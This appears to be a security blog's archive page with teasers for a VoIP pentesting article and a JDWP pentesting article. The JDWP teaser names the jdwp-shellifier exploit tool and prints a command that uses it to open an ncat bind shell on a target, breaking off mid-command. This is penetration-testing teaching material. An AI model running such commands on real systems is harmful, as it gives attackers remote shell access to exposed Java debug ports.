May 2024

Pentest VoIP

Pentest VOIP

Introduction Hey there! So, guess what we’re diving into today? Pen testing VoIP systems! Yeah, it’s like exploring the wild west of communication, but with a hacker’s twist. The thing is, we’ve noticed there’s kind of a gap in how folks talk about hacking into VoIP setups. So, we’re here to shake things up a

Pentest VOIP Read More »

JDWP

Pentesting Java Debug Wire Protocol | JDWP

Introduction In this article, you will learn how to pentest the Java Debug Wire Protocol aka JDWP, If you have any doubts comment down below. Exploiting you can utilize the Python exploit found at the website https://github.com/IOActive/jdwp-shellifier. ./jdwp-shellifier.py -t 192.168.2.9 -p 8000 #Obtain internal data./jdwp-shellifier.py -t 192.168.2.9 -p 8000 –cmd ‘ncat -l -p 1337 -e

Pentesting Java Debug Wire Protocol | JDWP Read More »